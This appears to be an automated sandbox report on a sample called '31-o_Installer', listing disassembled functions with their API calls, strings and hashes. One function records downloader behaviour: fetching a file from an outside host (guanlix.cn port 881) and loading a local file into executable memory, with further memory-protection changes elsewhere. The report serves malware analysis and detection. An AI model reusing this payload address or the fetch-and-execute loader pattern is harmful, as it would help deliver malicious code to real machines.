API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 1093f04a73dac9305dbc2158974e9eccb2378d15fba036a640f4592c2c54aaf4
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: 4821C2B224130A6FD3609A64CC48EBB77ECEB84315B045C3EBE46D2550EB74E5088B60

Function 0026297F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0026297F
_Fputc.LIBCPMT ref: 002629E4
_Fputc.LIBCPMT ref: 00262ABA

Strings

, xrefs: 00262A91

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction ID: 82e19215fa0f5cfe72516bff9f773a2622e3bedea6e30f37a4188476cc66a5db
Opcode Fuzzy Hash: bdaf987eb92baa9bad55c814e67242334d8216569f66f1728ea4cae15efbe1bc
Instruction Fuzzy Hash: A4418231921A05DFCF25CF94C980AEEB7F5FF58710F24051AE552A7280D7B1AD98CB61

Function 02E700CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02E7011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02E7014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02E70179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02E701A3

Memory Dump Source

Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: f8e983ecc477ba9925cf5e41952c1660d494a9f6b9303453316a321a9314775f
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: AA2153B22447496FE320DA65CC88F7B77ECEB88705B04983DBA87D1551EB74E5058A70

Function 00262F3D Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00261186: __time64.LIBCMT ref: 0026118E
Part of subcall function 00261186: _rand.LIBCMT ref: 0026119E
Part of subcall function 00261186: _rand.LIBCMT ref: 002611AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 00262F4E

Part of subcall function 00262E58: __EH_prolog.LIBCMT ref: 00262E5D
Part of subcall function 00262E58: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
Part of subcall function 00262E58: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
Part of subcall function 00262E58: InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
Part of subcall function 00262E58: InternetCloseHandle.WININET(?), ref: 00262F12
Part of subcall function 00262E58: InternetCloseHandle.WININET(?), ref: 00262F2A

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00262F6F

Part of subcall function 0026168B: _wprintf.LIBCMT ref: 0026169D
Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616B5
Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616CD
Part of subcall function 0026168B: _wprintf.LIBCMT ref: 002616E5

Part of subcall function 002611E1: GetTickCount64.KERNEL32 ref: 002611EF
Part of subcall function 002611E1: Sleep.KERNEL32(0000012C), ref: 002611F9
Part of subcall function 002611E1: GetTickCount64.KERNEL32 ref: 002611FF
Part of subcall function 002611E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00261244
Part of subcall function 002611E1: GetFileSize.KERNEL32(00000000,00000000), ref: 0026124E
Part of subcall function 002611E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 0026125F
Part of subcall function 002611E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00261270
Part of subcall function 002611E1: CloseHandle.KERNEL32(00000000), ref: 00261277

Strings

C:\Users\Public\Downloads\ind.cod, xrefs: 00262F54
http://guanlix.cn:881/31.ccp, xrefs: 00262F59

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Internet$File_wprintf$CloseHandleVirtual$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.cod$http://guanlix.cn:881/31.ccp
API String ID: 2148924518-2732001866
Opcode ID: 8034c467d5ce1137f2f85c04ec11cfea03ebdd164fa63e7de391422458f4cfab
Instruction ID: ac54ba6bc0e3c31e38724b2191e5a9d8e2113d51b61995f2df14cab49817a53c
Opcode Fuzzy Hash: 8034c467d5ce1137f2f85c04ec11cfea03ebdd164fa63e7de391422458f4cfab
Instruction Fuzzy Hash: 1AE0C2722B43507AF25073B06C0FF9A011C8B01B41F148010F20CA80C1D9D138F28E68

Function 02E6FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02E6FB8F
LoadLibraryA.KERNEL32(00000238), ref: 02E6FC2C

Memory Dump Source

Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 7bb166a9120c5aee43c93daf5f6647e4f474ae97015972200c91f0c7b15571ac
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: 1461E2325C0B02ABCB319AA0DC88BABB7AAFF06358F14A919F65A45840DB31F151CF51

Function 00265902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A95F: __getptd_noexit.LIBCMT ref: 0026A95F

__lock_file.LIBCMT ref: 00265949

Part of subcall function 002650E4: __lock.LIBCMT ref: 00265109

__fclose_nolock.LIBCMT ref: 00265954

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: fdf473249aa9fe9cafd829e67a9dd94bdd3d2c92bdd31f322e9f8c181ba6a183
Instruction ID: 319d97190e8e9911ce18251753903ab8c4d772859bc70eefbf03d87fcc833b07
Opcode Fuzzy Hash: fdf473249aa9fe9cafd829e67a9dd94bdd3d2c92bdd31f322e9f8c181ba6a183
Instruction Fuzzy Hash: 14F09030832B26DADB10AB74880675E7BA06F01335F358248A475AB0C1C7788AE19ED6

Function 0026184B Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 002618A8

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction ID: 9e5ebe943b15ef0442c3ce12cd92ef6707bdb9243a7053b5f1b3c79c26787d4a
Opcode Fuzzy Hash: 7953638f3f25e3a1c1ef1a9b40900645cc6313bdfea29492fdfdc0122a234614
Instruction Fuzzy Hash: 4331483592164AEFDB50CF29C84459DB7B5FF09365F18826AE82487191E370EEB0CF80

Function 05337950 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05337912), ref: 053379FF

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: fe54cc108ba6b4596eb5eb1e9332da7fe00b54c28fba030e6b518070866e0ab0
Instruction ID: 4f80ce55e28d67a21f06ce1f0d7e10944d4fdd3b8ad73769a900c5d32d2ed1a1
Opcode Fuzzy Hash: fe54cc108ba6b4596eb5eb1e9332da7fe00b54c28fba030e6b518070866e0ab0
Instruction Fuzzy Hash: 41218BB1C0469A9FDB10CFAAC4447AEFBF0EF48320F15856AD944A3340E778A955CFA1

Function 00262D2E Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00262D33

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6d623bffb95673ef404d7dba4ab93791444f4260a7974a059246245bf3e6eafa
Instruction ID: e3a0e3511b210310920cf41dbedc91ca60764561306968301a99aeb6cd33c281
Opcode Fuzzy Hash: 6d623bffb95673ef404d7dba4ab93791444f4260a7974a059246245bf3e6eafa
Instruction Fuzzy Hash: 08115BB1A20615EFDB20DF88C885AAAF7F9FB44304F00845EF44697241C7B09DA0CB60

Function 00262D33 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00262D33

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5944f05017620e08dad4ea7e04f1f10a232479e15c16545bb876be5740193df0
Instruction ID: 97fc7ebc3178507977688060ef75c2ba6af662d2175f7df9391a1cdbaf36aae5
Opcode Fuzzy Hash: 5944f05017620e08dad4ea7e04f1f10a232479e15c16545bb876be5740193df0
Instruction Fuzzy Hash: F6113DB1A20615EFDB24DF98C885AAEF7F9FB44304F14845EF44697241C7B19D64CB60

Function 053374B0 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05337912), ref: 053379FF

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 99dfdd613a31d396efe835985a063433f38f3dfdf10034d10a507325ea465174
Instruction ID: e0307bfe6f8425dc5fef33b8e3c83bac652c48645920b26519135f5b002411b7
Opcode Fuzzy Hash: 99dfdd613a31d396efe835985a063433f38f3dfdf10034d10a507325ea465174
Instruction Fuzzy Hash: 091136B1C006599BDB10CF9AC44479EFBB4EF48224F14856AE918A7200D7B8AA50CFA1

Function 00262483 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00262488

Part of subcall function 0026130B: std::locale::facet::_Incref.LIBCPMT ref: 0026131E

Part of subcall function 0026235F: __EH_prolog.LIBCMT ref: 00262364
Part of subcall function 0026235F: std::_Lockit::_Lockit.LIBCPMT ref: 00262373
Part of subcall function 0026235F: int.LIBCPMT ref: 0026238A

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: daa1db195fd6bd9b4c7fd87503bd1550d330d36337d29b589b1b8e024949721c
Instruction ID: 8b7638229a1c853bbbbfecff4098855cefb7e5697c07b4a21b743ff378179aa8
Opcode Fuzzy Hash: daa1db195fd6bd9b4c7fd87503bd1550d330d36337d29b589b1b8e024949721c
Instruction Fuzzy Hash: 6EF09032A70954EBCF15EF58CC02BAE33A9AF14711F048429F806D2185DFB49AF4CB90

Function 00262488 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00262488

Part of subcall function 0026130B: std::locale::facet::_Incref.LIBCPMT ref: 0026131E

Part of subcall function 0026235F: __EH_prolog.LIBCMT ref: 00262364
Part of subcall function 0026235F: std::_Lockit::_Lockit.LIBCPMT ref: 00262373
Part of subcall function 0026235F: int.LIBCPMT ref: 0026238A

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction ID: 6edba36c6a11ce6ab369e65031e7b452bcffd907e1ff576e81220937500bcf2f
Opcode Fuzzy Hash: 490e9eafea28b7231c9ce6db28adc78f9dfeee47710b6a22a510ec3a2bc9715b
Instruction Fuzzy Hash: A8F09032A70554EFCF15EF64CC02BAE33A9AB14711F044419F805D2585DFB49AF4DB80

Function 02EBD510 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02593f5c71f8fb5873f24bac622efd7a9d1f85b5450d0391c65630c6dfd2e83
Instruction ID: 14f646cb17a2fcf47f970570207e71b4747355b8c71a70e75821f80b3591dca8
Opcode Fuzzy Hash: f02593f5c71f8fb5873f24bac622efd7a9d1f85b5450d0391c65630c6dfd2e83
Instruction Fuzzy Hash: C02122B6644204EFDB06DF14DDC0BA7BF65FF88328F24C169E90A4B256C336D456CAA1

Function 02EBD50B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2407cf4952b9ec18cec18172483e5790cdfff90552ab70702f4a382f61ab051d
Instruction ID: f0a91d47c02d273933418ce2257b099ae496fd619f46c6d5ebae1f596e87ff24
Opcode Fuzzy Hash: 2407cf4952b9ec18cec18172483e5790cdfff90552ab70702f4a382f61ab051d
Instruction Fuzzy Hash: DA11D076544284CFDB16CF10D9C4B56BF71FF84328F28C6A9D8094B656C33AD45ACBA2

Function 02EBD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347056a5bdf146723faa9c1595d831a98236e5ef93dbb5963f1a18594679a0c0
Instruction ID: a85c337205a2d8c368bfb515161684e5761c37c58b301d0b41056b48bd17e3c4
Opcode Fuzzy Hash: 347056a5bdf146723faa9c1595d831a98236e5ef93dbb5963f1a18594679a0c0
Instruction Fuzzy Hash: E8012D6144E3C05EE7138B258C94756BFB49F43228F19C1DBD9888F1A7C2695849C772

Function 02EBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4546926592.0000000002EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebd000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3301c82ec15e081e71138a6795670485777ed36968cba7148ffefaab1482ae61
Instruction ID: da19ace12ae9f390ccba38b7993bd70ba2253228d5128aebcd1303d92cdfeac4
Opcode Fuzzy Hash: 3301c82ec15e081e71138a6795670485777ed36968cba7148ffefaab1482ae61
Instruction Fuzzy Hash: 01012671449340DAE7124E65CD84BE7BF98DF81378F08D01AEE084B246CBB99841CBB1

Non-executed Functions

Function 0026F4CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000,00000000), ref: 0026F50C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000,00000000), ref: 0026F535
GetACP.KERNEL32(?,?,0026FB0A,?,00266AFC,?,000000BC,?,00000001,00000000), ref: 0026F549

Strings

ACP, xrefs: 0026F4DC
OCP, xrefs: 0026F4ED

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 8cd45115ed556b41378042bac9eb1b93e2f9dae594d47b891d894a2be8fbedcc
Instruction ID: f4a7724de99076206c3b5d99acddd64a298cffda461fcde45d8e2aa4e1e64ae1
Opcode Fuzzy Hash: 8cd45115ed556b41378042bac9eb1b93e2f9dae594d47b891d894a2be8fbedcc
Instruction Fuzzy Hash: 6F01D431621307BAEF11DF61BD0AB5E72E8AF0235CF504024F106E1080EB70DEE1CA55

Function 002665D1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0026E003
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0026E018
UnhandledExceptionFilter.KERNEL32(0027AEF0), ref: 0026E023
GetCurrentProcess.KERNEL32(C0000409), ref: 0026E03F
TerminateProcess.KERNEL32(00000000), ref: 0026E046

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 9d6c91a8cb7c2cf23152ab082b22c9f7824e3c50b5fed90094a41e3c137d69f7
Instruction ID: e4e5d9b00c6bc5a2cf2bc173bbfbe1e3c4a10aca956edf1db8db8a94beae4fe9
Opcode Fuzzy Hash: 9d6c91a8cb7c2cf23152ab082b22c9f7824e3c50b5fed90094a41e3c137d69f7
Instruction Fuzzy Hash: B021CDBC822304DFD740DF99FD8D6843BF8BB48751F50409AE90986AA0E7B069E28F05

Function 0026C78D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C74B), ref: 0026C792

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 93cb6415bf114ad55567e616fb640728f5aa25e00c1be4e9abef8cbad01c4376
Instruction ID: bc4b028dcd91ca032cb45bcb0891ac8f6f019307ab6044551d43ae4a0e8c6479
Opcode Fuzzy Hash: 93cb6415bf114ad55567e616fb640728f5aa25e00c1be4e9abef8cbad01c4376
Instruction Fuzzy Hash: B19002B067160046870227746D0E91975955A5960275244506145C4054EBA055D05952

Function 00270BD6 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 750e1792565ec23c45c904713fa6c892cda33c55f17cc1d1acea19c2b18565d9
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: A3C1A473D2A5F3858B36892E049823FEE626E81B8431FC395DCD83F589C2376D2995D0

Function 002707EE Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: d2f6e4be5aca2c29cd0f915208d5f44041dcf34ae199e71851586fac6451c023
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 49C19073D2A5F3C58B358A2D049863BEA626E81B9431FC391DCD83F189C2376D2996D0

Function 0027041C Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: ce7344e45790d656b7895ae2cff34a6f6283061c54470a445114be16931c4b75
